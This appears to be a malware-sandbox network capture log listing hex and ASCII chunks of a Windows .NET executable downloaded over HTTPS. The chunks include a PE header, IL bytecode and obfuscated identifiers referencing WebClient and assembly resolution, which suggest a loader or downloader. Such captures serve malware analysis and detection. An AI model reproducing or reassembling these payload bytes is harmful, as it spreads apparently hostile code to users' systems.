                                                                                                                          2022-05-21 07:32:24 UTC615INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f6 56 74 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 f2 06 00 00 52 00 00 00 00 00 00 9e 10 07 00 00 20 00 00 00 20 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVtb.R @ @
                                                                                                                          2022-05-21 07:32:24 UTC631INData Raw: 17 3a 8e ff ff ff 26 38 46 00 00 00 20 da 09 00 00 28 f9 00 00 06 0b 20 07 00 00 00 16 39 72 ff ff ff 26 06 20 9a 0a 00 00 28 f9 00 00 06 28 03 01 00 06 3a 1a ff ff ff 20 06 00 00 00 38 52 ff ff ff 38 0b 00 00 00 20 ee 0a 00 00 28 f9 00 00 06 0b dd 0d 00 00 00 08 39 06 00 00 00 08 28 04 01 00 06 dc 07 13 04 dd 12 00 00 00 26 20 dc 0a 00 00 28 f9 00 00 06 13 04 dd 00 00 00 00 11 04 2a 00 00 41 34 00 00 02 00 00 00 25 00 00 00 5f 01 00 00 84 01 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 8b 01 00 00 99 01 00 00 12 00 00 00 3c 00 00 01 13 30 05 00 f0 00 00 00 14 00 00 11 2b 09 28 64 34 63 5a 14 16 9a 26 16 2d f9 28 26 00 00 06 39 1a 00 00 00 7e 8e 00 00 0a 20 fa 0a 00 00 28 a3 01 00 06 6f 8f 00 00 0a 0a 38 15 00 00 00 7e 8e 00 00 0a 20 5a 0b 00 00
                                                                                                                          Data Ascii: :&8F ( 9r& ((: 8R8 (9(& (*A4%_<0+(d4cZ&-(&9~ (o8~ Z
                                                                                                                          2022-05-21 07:32:24 UTC645INData Raw: 5a 00 00 00 38 0f 09 00 00 20 37 00 00 00 20 68 00 00 00 58 fe 0e 2f 00 20 a8 00 00 00 fe 0e 34 00 17 3a ed 08 00 00 fe 0c 18 00 13 0e 20 6f 00 00 00 38 d9 08 00 00 11 2b 11 05 11 1f 58 11 0d 11 15 5f 11 2d 1f 1f 5f 64 d2 9c 20 97 01 00 00 38 bb 08 00 00 11 31 38 09 23 00 00 20 45 00 00 00 38 aa 08 00 00 20 85 00 00 00 20 20 00 00 00 58 fe 0e 09 00 20 91 00 00 00 38 99 08 00 00 20 aa 00 00 00 20 01 00 00 00 58 fe 0e 1b 00 20 ac 00 00 00 fe 0e 34 00 16 39 77 08 00 00 fe 0c 18 00 20 19 00 00 00 20 cc 00 00 00 20 44 00 00 00 59 9c 20 a7 00 00 00 38 54 08 00 00 20 96 00 00 00 20 32 00 00 00 59 fe 0e 1b 00 20 7e 01 00 00 fe 0e 34 00 17 3a 3a 08 00 00 fe 0c 18 00 20 09 00 00 00 fe 0c 09 00 9c 20 84 00 00 00 38 26 08 00 00 fe 0c 18 00 20 1a 00 00 00 fe 0c 09 00
                                                                                                                          Data Ascii: Z8 7 hX/ 4: o8+X_-_d 818# E8 X 8 X 49w DY 8T 2Y ~4:: 8&
                                                                                                                          2022-05-21 07:32:24 UTC661INData Raw: 04 3a 00 00 08 00 93 00 62 10 a3 01 15 00 20 3a 00 00 08 00 93 00 7c 10 a3 01 15 00 3c 3a 00 00 08 00 93 00 8f 10 43 01 15 00 5c 3a 00 00 08 00 93 00 a2 10 58 01 15 00 7c 3a 00 00 08 00 93 00 bb 10 58 01 16 00 9c 3a 00 00 08 00 93 00 ce 10 58 01 17 00 bc 3a 00 00 08 00 93 00 e1 10 58 01 18 00 dc 3a 00 00 08 00 93 00 f4 10 58 01 19 00 fc 3a 00 00 08 00 93 00 07 11 43 01 1a 00 1c 3b 00 00 08 00 93 00 1b 11 43 01 1a 00 3c 3b 00 00 08 00 93 00 2f 11 95 02 1a 00 5c 3b 00 00 08 00 93 00 43 11 43 01 1b 00 7c 3b 00 00 08 00 93 00 57 11 11 01 1b 00 9c 3b 00 00 08 00 93 00 7c 11 9b 02 1b 00 bc 3b 00 00 08 00 93 00 b1 11 08 01 1b 00 d8 3b 00 00 08 00 93 00 cb 11 08 01 1b 00 f4 3b 00 00 08 00 93 00 e4 11 04 01 1b 00 0c 3c 00 00 08 00 93 00 03 12 04 01 1b 00 24 3c 00
                                                                                                                          Data Ascii: :b :|<:C\:X|:X:X:X:X:C;C<;/\;CC|;W;|;;;<$<
                                                                                                                          2022-05-21 07:32:24 UTC677INData Raw: 69 6f 6e 00 4d 39 50 65 65 74 75 59 48 45 00 4d 61 6e 75 61 6c 52 65 73 65 74 45 76 65 6e 74 00 75 6a 63 65 79 6b 76 79 43 6d 00 57 65 62 43 6c 69 65 6e 74 00 53 79 73 74 65 6d 2e 4e 65 74 00 53 74 72 65 61 6d 00 53 79 73 74 65 6d 2e 49 4f 00 69 5a 62 65 30 79 50 31 62 66 00 52 65 73 6f 6c 76 65 45 76 65 6e 74 48 61 6e 64 6c 65 72 00 64 38 4f 36 46 36 79 62 63 46 46 6b 76 48 41 36 58 4c 76 00 61 61 54 69 5a 46 79 6f 57 71 41 59 68 4c 54 62 59 72 5a 00 72 45 4f 50 50 42 79 54 6b 75 76 6b 79 78 49 31 73 51 45 00 57 61 69 74 48 61 6e 64 6c 65 00 57 61 69 74 4f 6e 65 00 45 37 38 33 4c 6c 79 53 43 71 70 38 6a 4b 6a 4e 37 75 4c 00 67 4e 6b 37 54 6d 79 70 38 42 52 55 53 77 49 4c 43 71 32 00 49 47 50 70 70 67 79 34 73 77 70 76 58 5a 6d 43 32 35 45 00 4f 70 65 6e
                                                                                                                          Data Ascii: ionM9PeetuYHEManualResetEventujceykvyCmWebClientSystem.NetStreamSystem.IOiZbe0yP1bfResolveEventHandlerd8O6F6ybcFFkvHA6XLvaaTiZFyoWqAYhLTbYrZrEOPPByTkuvkyxI1sQEWaitHandleWaitOneE783LlySCqp8jKjN7uLgNk7Tmyp8BRUSwILCq2IGPppgy4swpvXZmC25EOpen
                                                                                                                          2022-05-21 07:32:24 UTC693INData Raw: ee eb d4 b3 72 7a 53 68 63 34 47 bc 8c 92 e9 ca f3 93 6a be 76 6d 92 fa f4 b1 3d 65 2d 3b 22 58 7d 9f dc bd 2e 07 93 fa 5b 3d 89 c0 ef 1e 20 9e de ff 1f cf 0f 43 76 97 ec 61 f8 8c b2 bf dd b4 c0 65 b0 ff 41 d6 3b 26 35 0b af 59 93 06 44 8c eb c4 43 78 81 26 f0 15 7a 5b bd f5 a1 2c 60 2e 2e d5 a6 1d ec 11 8e c5 9a 6d a5 56 52 ba 42 4a 4b 70 80 88 96 2e 3e d0 89 8d 51 04 81 40 73 a1 05 88 26 2c 94 1d 76 c0 e3 30 5c 4b ec 17 a0 c1 8e 11 67 49 9f eb 75 8a 51 ab 9e e1 c4 30 a5 81 90 db 39 ae 21 93 e0 ad c5 5d 1e cc 92 7a 4c a1 e2 04 b7 7a e4 7b 6e d2 67 89 27 f2 05 e7 97 6a de ec 8b 43 e9 22 36 33 eb 15 ba fe d7 37 32 1d 00 07 a8 4e ef 97 02 90 0a 74 cb 6e 7d bf 5d 61 0b e4 6e 66 04 61 cf 1e 3e 82 a6 de 67 9e 3d 81 c6 02 f1 4a fd 63 73 9a 37 04 24 ee 04 a2 ef
                                                                                                                          Data Ascii: rzShc4Gjvm=e-;"X}.[= CvaeA;&5YDCx&z[,`..mVRBJKp.>Q@s&,v0\KgIuQ09!]zLz{ng'jC"6372Ntn}]anfa>g=Jcs7$
                                                                                                                          2022-05-21 07:32:24 UTC709INData Raw: 0a 2d 04 16 0c de 16 06 6f 18 00 00 0a 2d e4 de 0a 06 2c 06 06 6f 17 00 00 0a dc 17 2a 08 2a 00 01 10 00 00 02 00 1d 00 20 3d 00 0a 00 00 00 00 1b 30 02 00 27 00 00 00 1d 00 00 11 02 72 43 00 00 70 28 0a 00 00 2b 02 6f d8 00 00 0a 0a 06 6f 18 00 00 0a 0b de 0a 06 2c 06 06 6f 17 00 00 0a dc 07 2a 00 01 10 00 00 02 00 12 00 09 1b 00 0a 00 00 00 00 36 02 03 28 1b 00 00 2b 28 47 00 00 2b 2a 26 02 03 14 28 48 00 00 2b 2a 13 30 03 00 66 00 00 00 1e 00 00 11 73 26 01 00 0a 0a 06 04 7d 27 01 00 0a 06 03 7d 28 01 00 0a 02 72 43 00 00 70 28 0a 00 00 2b 06 7b 27 01 00 0a 2d 17 02 75 55 00 00 1b 0b 07 2c 0d 07 06 7b 28 01 00 0a 6f 29 01 00 0a 2a 06 25 7b 27 01 00 0a 25 2d 06 26 28 2a 01 00 0a 7d 27 01 00 0a 02 06 fe 06 2b 01 00 0a 73 2c 01 00 0a 28 49 00 00 2b 2a 26
                                                                                                                          Data Ascii: -o-,o** =0'rCp(+oo,o*6(+(G+*&(H+*0fs&}'}(rCp(+{'-uU,{(o)*%{'%-&(*}'+s,(I+*&
                                                                                                                          2022-05-21 07:32:24 UTC725INData Raw: 4b 00 00 04 93 0a 06 1f 4e 42 89 00 00 00 06 1f 20 35 30 06 39 c6 00 00 00 06 1f 09 59 45 05 00 00 00 32 02 00 00 27 02 00 00 45 02 00 00 45 02 00 00 1b 02 00 00 06 1f 20 3b 2a 02 00 00 38 38 02 00 00 06 1f 2f 35 3a 06 1f 22 3b be 00 00 00 06 1f 27 59 45 09 00 00 00 91 00 00 00 fe 01 00 00 bc 01 00 00 fe 01 00 00 fe 01 00 00 b2 01 00 00 2f 01 00 00 fe 01 00 00 5c 01 00 00 38 f9 01 00 00 06 1f 49 3b 1a 01 00 00 06 1f 4e 3b 0a 01 00 00 38 e4 01 00 00 06 1f 66 35 1a 06 1f 5b 3b 5c 01 00 00 06 1f 5d 3b 6b 01 00 00 06 1f 66 2e 6e 38 c5 01 00 00 06 1f 74 35 0f 06 1f 6e 2e 67 06 1f 74 2e 52 38 b1 01 00 00 06 1f 75 3b 0f 01 00 00 06 1f 7b 3b 0f 01 00 00 38 9c 01 00 00 02 7b 4a 00 00 04 02 7b 4b 00 00 04 33 0e 02 16 28 69 01 00 06 3a ff fe ff ff 16 2a 02 02 7b 4b
                                                                                                                          Data Ascii: KNB 509YE2'EE ;*88/5:";'YE/\8I;N;8f5[;\];kf.n8t5n.gt.R8u;{;8{J{K3(i:*{K
                                                                                                                          2022-05-21 07:32:24 UTC741INData Raw: 00 04 03 6f a5 02 00 0a 1f 46 03 6f 9b 02 00 0a 07 6f c4 02 00 0a 0c 03 6f c0 02 00 0a 2c 36 08 03 6f c5 02 00 0a 7e 4a 03 00 04 25 2d 17 26 7e 48 03 00 04 fe 06 fe 09 00 06 73 c6 02 00 0a 25 80 4a 03 00 04 28 96 00 00 2b 28 97 00 00 2b 6f c7 02 00 0a 26 08 6f c8 02 00 0a 0d 09 06 28 e8 02 00 06 09 28 e7 02 00 06 02 03 07 09 28 e5 02 00 06 09 28 e4 02 00 06 2a 32 02 7e c9 02 00 0a 6f 89 02 00 0a 2a 00 00 13 30 04 00 3f 00 00 00 85 00 00 11 02 03 04 28 e6 02 00 06 0a 06 2d 26 72 c1 22 00 70 03 6f a5 02 00 0a 72 ef 22 00 70 02 7b c2 00 00 04 6f 9d 02 00 0a 28 ca 02 00 0a 73 cb 02 00 0a 7a 05 7e cc 02 00 0a 06 6f cd 02 00 0a 2a ba 03 6f c0 02 00 0a 2c 13 02 7b c2 00 00 04 03 6f a5 02 00 0a 04 28 ed 02 00 06 2a 02 7b c2 00 00 04 03 6f a5 02 00 0a 04 6f ce 02
                                                                                                                          Data Ascii: oFooo,6o~J%-&~Hs%J(+(+o&o((((*2~o*0?(-&r"por"p{o(sz~o*o,{o(*{oo
                                                                                                                          2022-05-21 07:32:24 UTC757INData Raw: 04 00 06 0a 02 7b f5 00 00 04 06 6f ee 03 00 0a 2c 0d 02 7b f5 00 00 04 06 6f ef 03 00 0a 2a 03 2d 08 04 73 3c 04 00 06 2b 07 03 04 6f 3e 04 00 06 0b 02 7b f5 00 00 04 07 6f f0 03 00 0a 02 04 6f 78 04 00 06 07 6f 34 04 00 06 28 28 04 00 06 02 04 6f 7c 04 00 06 07 6f 36 04 00 06 28 28 04 00 06 04 6f 76 04 00 06 2c 2a 16 0c 2b 18 02 07 08 04 6f 76 04 00 06 08 6f f1 03 00 0a 28 2a 04 00 06 08 17 58 0c 08 04 6f 76 04 00 06 6f f2 03 00 0a 32 da 04 6f 7a 04 00 06 2c 0d 02 07 04 6f 7a 04 00 06 28 2b 04 00 06 04 6f 8c 04 00 06 2c 0e 02 07 04 6f 8c 04 00 06 28 27 04 00 06 0b 07 2a 00 00 00 1b 30 04 00 3d 00 00 00 c7 00 00 11 03 2c 39 03 6f f3 03 00 0a 0a 2b 1c 06 6f f4 03 00 0a 0b 02 04 12 01 28 f5 03 00 0a 12 01 28 f6 03 00 0a 28 29 04 00 06 06 6f 18 00 00 0a 2d
                                                                                                                          Data Ascii: {o,{o*-s<+o>{ooxo4((o|o6((ov,*+ovo(*Xovo2oz,oz(+o,o('*0=,9o+o((()o-
                                                                                                                          2022-05-21 07:32:24 UTC773INData Raw: 00 00 01 28 55 02 00 0a 17 8d 3b 00 00 01 25 16 02 28 0f 05 00 06 a2 28 d5 03 00 06 28 1a 05 00 06 2a 00 00 13 30 06 00 ae 00 00 00 fc 00 00 11 03 75 64 00 00 01 2c 10 02 28 0f 05 00 06 2c 15 02 7b 73 01 00 04 2c 0d 02 28 17 05 00 06 6f 83 03 00 0a 2c 0c 03 74 64 00 00 01 73 81 03 00 0a 2a 02 7b 74 01 00 04 2c 22 02 28 15 05 00 06 02 7b 76 01 00 04 14 17 8d 13 00 00 01 25 16 03 a2 6f 6d 04 00 0a 74 46 00 00 02 2a 03 74 17 00 00 01 28 ab 00 00 2b 28 dc 00 00 2b 0a 02 28 0f 05 00 06 2c 33 02 28 0f 05 00 06 06 6f f5 00 00 0a 28 8a 03 00 0a 0b 16 0c 2b 12 07 06 08 6f 2f 00 00 0a 08 6f 6e 04 00 0a 08 17 58 0c 08 06 6f f5 00 00 0a 32 e5 07 0a 06 73 81 03 00 0a 2a 00 00 13 30 06 00 ad 00 00 00 fd 00 00 11 02 7b 76 01 00 04 3a a1 00 00 00 02 d0 47 00 00 02 28 55
                                                                                                                          Data Ascii: (U;%(((*0ud,(,{s,(o,tds*{t,"({v%omtF*t(+(+(,3(o(+o/onXo2s*0{v:G(U
                                                                                                                          2022-05-21 07:32:24 UTC789INData Raw: 33 11 04 09 6f c7 06 00 06 0a 06 14 fe 01 04 5f 39 ea 00 00 00 72 66 58 00 70 28 aa 01 00 0a 17 8d 13 00 00 01 25 16 09 a2 28 e2 03 00 06 73 b6 01 00 0a 7a 04 2c 2d 72 ba 58 00 70 28 aa 01 00 0a 18 8d 13 00 00 01 25 16 09 a2 25 17 06 6f 22 02 00 0a 6f a5 02 00 0a a2 28 e2 03 00 06 73 b6 01 00 0a 7a 14 13 05 dd b1 00 00 00 08 a5 a5 00 00 01 13 06 06 75 94 00 00 02 13 07 11 07 2c 44 11 07 6f 9b 06 00 06 11 06 30 2d 04 2c 25 72 fc 58 00 70 28 aa 01 00 0a 17 8d 13 00 00 01 25 16 11 06 8c a5 00 00 01 a2 28 e2 03 00 06 73 b9 04 00 0a 7a 14 13 05 de 65 11 07 11 06 6f f9 06 00 06 0a 2b 3b 04 2c 33 72 4c 59 00 70 28 aa 01 00 0a 18 8d 13 00 00 01 25 16 11 06 8c a5 00 00 01 a2 25 17 06 6f 22 02 00 0a 6f a5 02 00 0a a2 28 e2 03 00 06 73 b6 01 00 0a 7a 14 13 05 de 1e
                                                                                                                          Data Ascii: 3o_9rfXp(%(sz,-rXp(%%o"o(szu,Do0-,%rXp(%(szeo+;,3rLYp(%%o"o(sz
                                                                                                                          2022-05-21 07:32:24 UTC805INData Raw: 00 0a 28 ee 04 00 0a 13 04 12 03 11 04 28 fc 04 00 0a 2a 04 75 cc 00 00 1b 2d 0b 72 96 70 00 70 73 18 02 00 0a 7a 03 75 cc 00 00 1b 13 05 04 75 cc 00 00 1b 13 06 11 05 2d 02 15 2a 11 06 2d 02 17 2a 11 05 11 06 28 ad 03 00 06 2a 04 75 48 00 00 01 2d 0b 72 d4 70 00 70 73 18 02 00 0a 7a 03 a5 48 00 00 01 13 07 04 a5 48 00 00 01 13 08 12 07 11 08 28 fd 04 00 0a 2a 04 75 49 00 00 01 2d 0b 72 0e 71 00 70 73 18 02 00 0a 7a 03 74 49 00 00 01 13 09 04 74 49 00 00 01 13 0a 28 fe 04 00 0a 11 09 6f 81 00 00 0a 11 0a 6f 81 00 00 0a 6f ff 04 00 0a 2a 04 75 43 00 00 01 2d 0b 72 46 71 00 70 73 18 02 00 0a 7a 03 a5 43 00 00 01 13 0b 04 a5 43 00 00 01 13 0c 12 0b 11 0c 28 00 05 00 0a 2a 72 88 71 00 70 02 8c 99 00 00 02 72 9c 71 00 70 28 aa 01 00 0a 17 8d 13 00 00 01 25 16
                                                                                                                          Data Ascii: ((*u-rppszuu-*-*(*uH-rppszHH(*uI-rqpsztItI(ooo*uC-rFqpszCC(*rqprqp(%
                                                                                                                          2022-05-21 07:32:24 UTC821INData Raw: b4 08 00 06 06 6f 81 00 00 0a 2a 16 0c 38 fa fe ff ff 00 00 13 30 03 00 24 00 00 00 05 00 00 11 02 28 b1 08 00 06 0a 02 06 28 b4 08 00 06 02 06 17 59 28 ac 08 00 06 02 7b 2f 02 00 04 6f 92 05 00 0a 26 2a 13 30 06 00 0a 01 00 00 80 01 00 11 03 2d 06 7e 9f 03 00 0a 2a 02 28 af 08 00 06 14 0a 16 0b 16 0c 03 07 59 20 80 00 00 00 08 59 30 05 03 07 59 2b 07 20 80 00 00 00 08 59 0d 02 7b 2f 02 00 04 02 7b 31 02 00 04 08 09 6f 97 05 00 0a 13 04 11 04 2d 0b 72 41 84 00 70 73 98 05 00 0a 7a 07 11 04 58 0b 11 04 08 58 13 04 11 04 03 33 2b 28 94 05 00 0a 02 7b 31 02 00 04 16 11 04 02 7b 32 02 00 04 16 6f 95 05 00 0a 13 05 02 7b 32 02 00 04 16 11 05 73 f6 01 00 0a 2a 02 11 04 17 59 28 ad 08 00 06 13 06 06 2d 07 03 73 57 02 00 0a 0a 28 94 05 00 0a 02 7b 31 02 00 04 16
                                                                                                                          Data Ascii: o*80$((Y({/o&*0-~*(Y Y0Y+ Y{/{1o-rApszXX3+({1{2o{2s*Y(-sW({1
                                                                                                                          2022-05-21 07:32:24 UTC837INData Raw: 06 00 4e 30 20 a4 06 00 b2 48 7c 6a 06 00 58 86 20 a4 06 00 3d 73 7c 6a 06 00 98 60 20 a4 06 00 59 73 7c 6a 06 00 a6 73 7c 6a 06 00 a1 72 7c 6a 06 00 8d 72 7c 6a 06 00 5f 78 20 a4 06 00 0a 3c 7c 6a 06 00 6e 62 4b 18 06 00 7c 78 20 a4 06 00 4d 78 20 a4 06 00 26 73 7c 6a 06 00 5b 15 bb 19 0a 00 c9 7e dc 60 16 00 0b 37 6b 8e 06 00 48 ae f7 96 12 00 75 34 f3 61 06 00 a5 b8 f7 96 06 00 3f 86 f7 96 06 00 ec b9 f7 96 06 00 05 15 bd 60 06 00 0e 6f 34 65 06 00 88 78 c2 af 06 00 99 91 7c 6a 06 00 80 8e 7c 6a 06 00 1f 70 7c 6a 06 00 67 77 7c 6a 06 00 0c 78 34 65 6b 00 4a 86 00 00 06 00 0a 12 bd 60 06 00 95 92 34 65 0a 00 2b 4d dc 60 0a 00 0f 4c dc 60 06 00 dc 11 34 65 06 00 15 b6 7c 6a 06 00 86 7f 9f 69 06 00 08 71 34 65 06 00 27 38 9f 69 06 00 02 84 9f 69 06 00 d9
                                                                                                                          Data Ascii: N0 H|jX =s|j` Ys|js|jr|jr|j_x <|jnbK|x Mx &s|j[~`7kHu4a?`o4ex|j|jp|jgw|jx4ekJ`4e+M`L`4e|jiq4e'8ii
                                                                                                                          2022-05-21 07:32:24 UTC853INData Raw: fc 5d 00 00 00 00 e1 09 12 6e 9f 04 0a 02 20 5e 00 00 00 00 86 18 c4 86 7f 55 0a 02 54 5e 00 00 00 00 83 00 e5 79 e2 23 0b 02 5d 5e 00 00 00 00 81 00 ff 79 86 55 0c 02 8b 5e 00 00 00 00 81 00 05 40 01 00 0c 02 a4 5e 00 00 00 00 81 00 bb 5a 01 17 0d 02 62 5f 00 00 00 00 91 00 bc 97 8c 55 0e 02 78 5f 00 00 00 00 81 00 db 1b 06 00 13 02 ff 5f 00 00 00 00 81 00 36 19 87 33 13 02 0c 60 00 00 00 00 81 00 36 19 97 55 14 02 5a 61 00 00 00 00 81 00 9c 97 9d 55 16 02 78 61 00 00 00 00 81 00 92 97 9d 55 18 02 b0 61 00 00 00 00 91 00 68 a3 51 1d 1a 02 18 62 00 00 00 00 81 00 8d 49 10 00 1b 02 ba 62 00 00 00 00 c6 00 a3 1a 5e 00 1c 02 cc 62 00 00 00 00 81 00 12 a1 5e 00 1c 02 88 63 00 00 00 00 c6 00 fc 8f cc 33 1c 02 c8 64 00 00 00 00 c6 00 40 5f 5b 55 1c 02 c4 65 00
                                                                                                                          Data Ascii: ]n ^UT^y#]^yU^@^Zb_Ux__63`6UZaUxaUahQbIb^b^c3d@_[Ue
                                                                                                                          2022-05-21 07:32:24 UTC869INData Raw: 00 00 c6 08 e3 58 20 54 ff 06 e6 68 01 00 00 00 c6 08 f9 59 70 54 00 07 f3 68 01 00 00 00 c6 08 18 5a 75 54 00 07 01 69 01 00 00 00 c6 08 4d 57 7b 54 01 07 0e 69 01 00 00 00 c6 08 62 57 81 54 01 07 1c 69 01 00 00 00 c6 08 69 9d 88 54 02 07 29 69 01 00 00 00 c6 08 84 9d 8e 54 02 07 37 69 01 00 00 00 c6 08 99 59 95 54 03 07 44 69 01 00 00 00 c6 08 b1 59 9a 54 03 07 52 69 01 00 00 00 c6 08 0a 79 ba 54 04 07 5f 69 01 00 00 00 c6 08 15 79 c0 54 04 07 6d 69 01 00 00 00 c6 08 25 b0 de 54 05 07 7a 69 01 00 00 00 c6 08 31 b0 e4 54 05 07 88 69 01 00 00 00 83 00 52 82 d7 67 06 07 9f 69 01 00 00 00 86 18 c4 86 dd 67 06 07 c5 69 01 00 00 00 86 18 c4 86 e4 67 07 07 eb 69 01 00 00 00 c3 02 f4 5f 39 58 08 07 10 6a 01 00 00 00 c3 02 99 5f 17 58 0a 07 35 6a 01 00 00 00 c3
                                                                                                                          Data Ascii: X ThYpThZuTiMW{TibWTiiT)iT7iYTDiYTRiyT_iyTmi%Tzi1TiRgigigi_9Xj_X5j
                                                                                                                          2022-05-21 07:32:24 UTC885INData Raw: ef 01 f3 2f 94 0a 17 21 02 00 00 00 91 18 ca 86 eb 54 95 0a 6e 84 00 00 00 00 86 18 c4 86 06 00 95 0a 23 21 02 00 00 00 83 00 7f 02 c3 71 95 0a 2b 21 02 00 00 00 86 18 c4 86 01 00 96 0a 4c 21 02 00 00 00 e1 01 5b 49 06 00 97 0a c4 21 02 00 00 00 e1 01 b9 af 5e 00 97 0a 7c 23 02 00 00 00 81 00 25 13 06 00 97 0a 98 23 02 00 00 00 81 00 ae 15 06 00 97 0a b5 23 02 00 00 00 e1 09 7a a9 a3 04 97 0a 5f 85 01 00 00 00 e1 01 2c a3 06 00 97 0a bd 23 02 00 00 00 e1 09 bc aa 6e 00 97 0a cc 23 02 00 00 00 e1 01 99 84 17 3a 97 0a 20 24 02 00 00 00 e1 01 e5 85 20 00 97 0a 28 24 02 00 00 00 91 18 ca 86 eb 54 97 0a 6e 84 00 00 00 00 86 18 c4 86 06 00 97 0a 34 24 02 00 00 00 83 00 e6 00 f3 2f 97 0a 46 24 02 00 00 00 86 18 c4 86 01 00 98 0a 68 24 02 00 00 00 e1 01 5b 49 06
                                                                                                                          Data Ascii: /!Tn#!q+!L![I!^|#%##z_,#n#: $ ($Tn4$/F$h$[I
                                                                                                                          2022-05-21 07:32:24 UTC901INData Raw: 00 00 01 00 97 67 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 dd 51 00 00 01 00 36 71 00 00 02 00 3e 97 00 00 01 00 73 9c 00 00 01 00 99 b3 00 00 02 00 3b bd 00 00 01 00 ef b5 00 00 01 00 dd 51 00 00 01 00 b9 4a 00 00 01 00 b9 4a 00 00 01 00 b9 4a 00 00 01 00 b9 4a 00 00 01 00 2f 65 00 00 02 00 a8 5e 00 00 01 00 b9 4a 00 00 01 00 2f 65 00 00 02 00 a8 5e 00 00 01 00 b9 4a 00 00 01 00 2f 65 00 00 02 00 a8 5e 00 00 01 00 2f 65 00 00 02 00 2c 65 00 00 01
                                                                                                                          Data Ascii: gQQQQQQQQQQQQQQQQQQQQ6q>s;QJJJJ/e^J/e^J/e^/e,e
                                                                                                                          2022-05-21 07:32:24 UTC917INData Raw: e0 1a 00 00 e2 01 9b 3f e3 1a 00 00 8b 00 9b 3f 00 1b 00 00 e2 01 9b 3f 03 1b 00 00 8b 00 9b 3f 20 1b 00 00 e2 01 9b 3f 23 1b 00 00 8b 00 9b 3f 40 1b 00 00 e2 01 9b 3f 43 1b 00 00 8b 00 9b 3f 60 1b 00 00 e2 01 9b 3f 63 1b 00 00 8b 00 9b 3f 80 1b 00 00 e2 01 9b 3f 83 1b 00 00 8b 00 9b 3f a0 1b 00 00 e2 01 9b 3f a3 1b 00 00 8b 00 9b 3f c0 1b 00 00 e2 01 9b 3f c3 1b 00 00 8b 00 9b 3f e0 1b 00 00 e2 01 9b 3f e3 1b 00 00 8b 00 9b 3f 00 1c 00 00 e2 01 9b 3f 01 1c 00 00 8b 00 9b 3f 03 1c 00 00 8b 00 9b 3f 20 1c 00 00 e2 01 9b 3f 21 1c 00 00 8b 00 9b 3f 23 1c 00 00 8b 00 9b 3f 40 1c 00 00 e2 01 9b 3f 41 1c 00 00 8b 00 9b 3f 43 1c 00 00 8b 00 9b 3f 60 1c 00 00 e2 01 9b 3f 61 1c 00 00 8b 00 9b 3f 63 1c 00 00 8b 00 9b 3f 80 1c 00 00 e2 01 9b 3f 81 1c 00 00 8b 00 9b
                                                                                                                          Data Ascii: ???? ?#?@?C?`?c???????????? ?!?#?@?A?C?`?a?c??
                                                                                                                          2022-05-21 07:32:24 UTC933INData Raw: 31 00 20 01 1c 15 3f 00 20 01 1e 15 35 00 20 01 20 15 37 00 20 01 22 15 41 00 20 01 24 15 29 00 22 01 2e 15 2f 00 22 01 30 15 31 00 22 01 34 15 3f 00 22 01 36 15 35 00 22 01 38 15 37 00 22 01 3a 15 41 00 22 01 3c 15 29 00 24 01 48 15 2f 00 24 01 4a 15 31 00 24 01 50 15 b9 00 24 01 52 15 35 00 24 01 54 15 37 00 24 01 56 15 bb 00 24 01 58 15 29 00 27 01 6a 15 2f 00 27 01 6c 15 31 00 27 01 70 15 e7 00 27 01 72 15 35 00 27 01 74 15 37 00 28 01 78 15 2f 00 28 01 7a 15 31 00 28 01 7c 15 b9 00 28 01 7e 15 35 00 28 01 80 15 37 00 28 01 82 15 bb 00 28 01 84 15 29 00 29 01 88 15 2f 00 29 01 8a 15 31 00 29 01 8c 15 b9 00 29 01 8e 15 35 00 29 01 90 15 37 00 29 01 92 15 bb 00 29 01 94 15 29 00 2a 01 98 15 2f 00 2a 01 9a 15 31 00 2a 01 9c 15 b9 00 2a 01 9e 15 35 00 2a
                                                                                                                          Data Ascii: 1 ? 5 7 "A $)"./"01"4?"65"87":A"<)$H/$J1$P$R5$T7$V$X)'j/'l1'p'r5't7(x/(z1(|(~5(7(())/)1))5)7)))*/*1**5*
                                                                                                                          2022-05-21 07:32:24 UTC949INData Raw: 4c 65 6e 67 74 68 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 4d 61 78 69 6d 75 6d 4c 65 6e 67 74 68 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 4d 69 6e 69 6d 75 6d 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 45 78 63 6c 75 73 69 76 65 4d 69 6e 69 6d 75 6d 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 4d 61 78 69 6d 75 6d 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 45 78 63 6c 75 73 69 76 65 4d 61 78 69 6d 75 6d 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 45 6e 75 6d 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 48 69 64 64 65 6e 3e 6b 5f 